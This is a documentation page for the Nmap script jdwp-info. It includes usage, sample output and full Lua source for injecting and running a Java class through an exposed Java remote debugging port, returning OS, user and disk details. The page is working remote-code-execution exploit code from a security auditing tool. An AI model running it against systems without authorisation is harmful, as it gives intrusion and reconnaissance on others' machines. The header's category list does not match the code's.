<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File jdwp-info</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Aleksandar Nikolic<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/jdwp-info.nse">https://svn.nmap.org/nmap/scripts/jdwp-info.nse</a><br/>
<h3>Summary</h3>
<p>Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script injects and execute a Java class file that returns remote system information.</p>
<h3>Arguments</h3>
None
<h3>Usage</h3>
<pre>nmap -sT &lt;target&gt; -p &lt;port&gt; --script=+jdwp-info</pre>
<h3>Output</h3>
<pre>PORT     STATE SERVICE REASON
2010/tcp open  search  syn-ack
| jdwp-info:
|   Available processors: 1
|   Free memory: 15331736
|   File system root: A:\
|   Total space (bytes): 0
|   Free space (bytes): 0
|   File system root: C:\
|   Total space (bytes): 42935926784
|   Free space (bytes): 29779054592
|   File system root: D:\
|   Total space (bytes): 0
|   Free space (bytes): 0
|   Name of the OS: Windows XP
|   OS Version : 5.1
|   OS patch level : Service Pack 3
|   OS Architecture: x86
|   Java version: 1.7.0_01
|   Username: user
|   User home: C:\Documents and Settings\user
|_  System time: Sat Aug 11 15:21:44 CEST 2012</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/io.htm">io</a></li>
<li><a href="nmap/libraries/jdwp.htm">jdwp</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
</ul>
<h3>Code</h3>
<pre>local io = require &quot;io&quot;
local jdwp = require &quot;jdwp&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local nmap = require &quot;nmap&quot;
local shortport = require &quot;shortport&quot;

description = [[
Attempts to exploit java&#39;s remote debugging port.  When remote
debugging port is left open, it is possible to inject java bytecode
and achieve remote code execution.  This script injects and execute a
Java class file that returns remote system information.
]]

author = &quot;Aleksandar Nikolic&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;default&quot;,&quot;safe&quot;,&quot;discovery&quot;}

---
-- @usage nmap -sT &lt;target&gt; -p &lt;port&gt; --script=+jdwp-info
-- @output
-- PORT     STATE SERVICE REASON
-- 2010/tcp open  search  syn-ack
-- | jdwp-info:
-- |   Available processors: 1
-- |   Free memory: 15331736
-- |   File system root: A:\
-- |   Total space (bytes): 0
-- |   Free space (bytes): 0
-- |   File system root: C:\
-- |   Total space (bytes): 42935926784
-- |   Free space (bytes): 29779054592
-- |   File system root: D:\
-- |   Total space (bytes): 0
-- |   Free space (bytes): 0
-- |   Name of the OS: Windows XP
-- |   OS Version : 5.1
-- |   OS patch level : Service Pack 3
-- |   OS Architecture: x86
-- |   Java version: 1.7.0_01
-- |   Username: user
-- |   User home: C:\Documents and Settings\user
-- |_  System time: Sat Aug 11 15:21:44 CEST 2012

portrule = function(host, port)
  -- JDWP will close the port if there is no valid handshake within 2
  -- seconds, Service detection&#39;s NULL probe detects it as tcpwrapped.
  return port.service == &quot;tcpwrapped&quot;
  and port.protocol == &quot;tcp&quot; and port.state == &quot;open&quot;
  and not(shortport.port_is_excluded(port.number,port.protocol))
end

action = function(host, port)
  stdnse.sleep(5) -- let the remote socket recover from connect() scan
  local status,socket = jdwp.connect(host,port) -- initialize the connection
  if not status then
    stdnse.debug1(&quot;error, %s&quot;,socket)
    return nil
  end

  -- read .class file
  local file = io.open(nmap.fetchfile(&quot;nselib/data/jdwp-class/JDWPSystemInfo.class&quot;), &quot;rb&quot;)
  local class_bytes = file:read(&quot;a&quot;)

  -- inject the class
  local injectedClass
  status,injectedClass = jdwp.injectClass(socket,class_bytes)
  if not status then
    stdnse.debug1(&quot;Failed to inject class&quot;)
    return stdnse.format_output(false, &quot;Failed to inject class&quot;)
  end
  -- find injected class method
  local runMethodID = jdwp.findMethod(socket,injectedClass.id,&quot;run&quot;,false)

  if runMethodID == nil then
    stdnse.debug1(&quot;Couldn&#39;t find run method&quot;)
    return stdnse.format_output(false, &quot;Couldn&#39;t find run method.&quot;)
  end

  -- invoke run method
  local result
  status, result = jdwp.invokeObjectMethod(socket,0,injectedClass.instance,injectedClass.thread,injectedClass.id,runMethodID,0,nil)
  if not status then
    stdnse.debug1(&quot;Couldn&#39;t invoke run method&quot;)
    return stdnse.format_output(false, result)
  end
  -- get the result string
  local stringID = string.unpack(&quot;&gt;x I8&quot;,result)
  status,result = jdwp.readString(socket,0,stringID)
  -- parse results
  return stdnse.format_output(status,result)
end
</pre>
